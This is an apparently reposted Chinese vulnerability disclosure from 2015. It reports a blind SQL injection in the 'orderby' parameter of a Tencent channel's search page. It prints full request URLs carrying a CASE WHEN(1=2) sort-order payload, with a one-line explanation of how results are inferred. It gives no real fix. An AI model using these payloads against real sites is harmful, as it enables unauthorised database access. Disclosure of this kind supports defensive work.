选择风格

腾讯某频道某盲注及修复

时间：2015/5/19 19:02:48 作者：平凡之路　来源：xuhantao.com 浏览：

网址：
?classchg=&cnt=0&curpage=1&filterattr=4%7C6&filterstype=2%7C2&filtervalue=11%7C2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&orderby=F19%20desc&pagenum=20&site=digi&subcategory=%26%23191%3B%26%23213%3B%26%23181%3B%C2%A1%C3%82&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data

注入参数orderby

?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc

?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc

根据when() 中1=1 1=2 返回数据的排序方式进行盲注。
漏洞证明：?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc

?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc

根据when() 中1=1 1=2 返回数据的排序方式进行盲注。
修复方案：
应该懂得！
作者：Jannock ，涛涛电脑知识网，涛涛电脑知识网

分享到： QQ空间腾讯微博新浪微博人人网百度贴吧

上一篇：安乐业v3.0代码审计

下一篇：九阳客户服务中心网站存在mysql字符型盲注及修复